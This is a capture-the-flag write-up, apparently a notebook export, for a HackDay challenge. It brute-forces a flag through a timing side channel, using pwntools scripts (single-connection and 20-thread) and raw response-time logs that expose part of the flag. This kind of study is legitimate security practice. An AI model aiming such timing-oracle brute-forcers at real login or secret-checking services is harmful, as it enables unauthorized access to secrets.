# Who cares about SSI anyway ?

A system administrator, frustrated after a heated debate about cybersecurity standards, ended up creating a poorly secured cheat sheet. Convinced that he could outsmart his own cybersecurity experts, he disregarded some basic principles. The result? A vulnerable document that might hold sensitive information. Can you uncover his mistakes and decipher the secrets hidden ?



## Observations
- We know that payload of flag is HACKDAY{...} and we know it is 21 characters long.
- We see that if the first chars are correct, the bot takes more time to respond.

## Approach:
- We just need to bruteforce the flag character by character, by finding the character that takes the most time to respond.

In [16]:
import pwn, time

# open
p = pwn.remote('challenges.hackday.fr', 48118)

p.recv()

def trypayload(payload):
    t = time.perf_counter()
    p.sendline(payload)
    resp = p.recv().decode()
    r = 'Incorrect' in resp
    # print(resp)
    took = time.perf_counter() - t
    # print(f'{payload} -> {r} ({took:.2f}s)')
    return took

def sidechan(prefix):
    times = []
    if len(prefix) == 21:
        print(prefix)
        return
    for char in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_+-':
        payload = prefix + char
        took = trypayload(payload + 'a' * (21 - len(payload)))
        times.append((char, took))
        
    times.sort(key=lambda x: x[1])
    
    # print(prefix, times[-1], prefix + times[-1][0])
    sidechan(prefix + times[-1][0])

sidechan('')


[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+] Opening connection to challenges.hackday.fr on port 48118: Done
aaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
baaaaaaaaaaaaaaaaaaaa -> True (0.01s)
caaaaaaaaaaaaaaaaaaaa -> True (0.01s)
daaaaaaaaaaaaaaaaaaaa -> True (0.01s)
eaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
faaaaaaaaaaaaaaaaaaaa -> True (0.01s)
gaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
haaaaaaaaaaaaaaaaaaaa -> True (0.01s)
iaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
jaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
kaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
laaaaaaaaaaaaaaaaaaaa -> True (0.01s)
maaaaaaaaaaaaaaaaaaaa -> True (0.01s)
naaaaaaaaaaaaaaaaaaaa -> True (0.01s)
oaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
paaaaaaaaaaaaaaaaaaaa -> True (0.01s)
qaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
raaaaaaaaaaaaaaaaaaaa -> True (0.01s)
saaaaaaaaaaaaaaaaaaaa -> True (0.01s)
taaaaaaaaaaaaaaaaaaaa -> True (0.01s)
uaaaaaaaaaaaaaaaaaaaa -> Tr

C:\Users\rlang\AppData\Local\Temp\ipykernel_43576\4105275652.py:10: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendline(payload)


Daaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Eaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Faaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Gaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Haaaaaaaaaaaaaaaaaaaa -> True (0.11s)
Iaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Jaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Kaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Laaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Maaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Naaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Oaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Paaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Qaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Raaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Saaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Taaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Uaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Vaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Waaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Xaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Yaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
Zaaaaaaaaaaaaaaaaaaaa -> True (0.01s)
0aaaaaaaaaaaaaaaaaaaa -> True (0.01s)
1aaaaaaaaaaaaaaaaaaaa -> True (0.01s)
2aaaaaaaaaaaaaaaaaaaa -> True (0.01s)
3aaaaaaaaaaa

KeyboardInterrupt: 

It works, but we have too much time. So we try to use 20 threads.

In [18]:
import pwn
import time
from concurrent.futures import ThreadPoolExecutor

# Function to create a new connection
def create_connection():
    conn = pwn.remote('challenges.hackday.fr', 48118)
    conn.recv()
    return conn

# Worker function to try payloads
def trypayload(conn, payload):
    t = time.perf_counter()
    conn.sendline(payload)
    resp = conn.recv().decode()
    r = 'Incorrect' in resp
    took = time.perf_counter() - t
    return took, r

# Function to handle side-channel attack logic
def sidechan(prefix, connections):
    times = []
    if len(prefix) == 21:
        print(prefix)
        return

    def process_char(char):
        conn = connections.pop()
        payload = prefix + char
        took, _ = trypayload(conn, payload + 'a' * (21 - len(payload)))
        connections.append(conn)
        print(f'{payload} -> {took:.2f}s')
        return char, took

    with ThreadPoolExecutor(max_workers=len(connections)) as executor:
        results = list(executor.map(process_char, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_+-'))

    times = sorted(results, key=lambda x: x[1])
    sidechan(prefix + times[-1][0], connections)

# Main function
def main():
    num_connections = 20
    connections = [create_connection() for _ in range(num_connections)]

    try:
        sidechan('HACKDAY{TIM3_', connections)
    finally:
        for conn in connections:
            conn.close()

if __name__ == "__main__":
    main()


[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+] Opening connection to challenges.hackday.fr on port 48118: Done
[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+] Opening connection to challenges.hackday.fr on port 48118: Done
[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+] Opening connection to challenges.hackday.fr on port 48118: Done
[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+] Opening connection to challenges.hackday.fr on port 48118: Done
[x] Opening connection to challenges.hackday.fr on port 48118
[x] Opening connection to challenges.hackday.fr on port 48118: Trying 51.210.149.5
[+]

C:\Users\rlang\AppData\Local\Temp\ipykernel_43576\4138462714.py:14: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  conn.sendline(payload)


HACKDAY{TIM3_a -> 1.31s
HACKDAY{TIM3_d -> 1.31s
HACKDAY{TIM3_c -> 1.31s
HACKDAY{TIM3_b -> 1.31s
HACKDAY{TIM3_e -> 1.31s
HACKDAY{TIM3_f -> 1.31s
HACKDAY{TIM3_k -> 1.31s
HACKDAY{TIM3_j -> 1.31s
HACKDAY{TIM3_o -> 1.31s
HACKDAY{TIM3_m -> 1.31s
HACKDAY{TIM3_h -> 1.31s
HACKDAY{TIM3_g -> 1.31s
HACKDAY{TIM3_q -> 1.31s
HACKDAY{TIM3_n -> 1.31s
HACKDAY{TIM3_i -> 1.31s
HACKDAY{TIM3_l -> 1.31s
HACKDAY{TIM3_r -> 1.31s
HACKDAY{TIM3_p -> 1.31s
HACKDAY{TIM3_s -> 1.31s
HACKDAY{TIM3_t -> 1.41s
HACKDAY{TIM3_w -> 1.31s
HACKDAY{TIM3_u -> 1.31s
HACKDAY{TIM3_x -> 1.31s
HACKDAY{TIM3_A -> 1.31s
HACKDAY{TIM3_C -> 1.31s
HACKDAY{TIM3_y -> 1.31s
HACKDAY{TIM3_F -> 1.31s
HACKDAY{TIM3_G -> 1.31s
HACKDAY{TIM3_B -> 1.31s
HACKDAY{TIM3_E -> 1.31s
HACKDAY{TIM3_M -> 1.31s
HACKDAY{TIM3_L -> 1.31s
HACKDAY{TIM3_D -> 1.31s
HACKDAY{TIM3_v -> 1.31s
HACKDAY{TIM3_K -> 1.31s
HACKDAY{TIM3_z -> 1.31s
HACKDAY{TIM3_J -> 1.31s
HACKDAY{TIM3_I -> 1.31s
HACKDAY{TIM3_H -> 1.31s
HACKDAY{TIM3_N -> 1.31s
HACKDAY{TIM3_S -> 1.31sHACKDAY{TIM3_R ->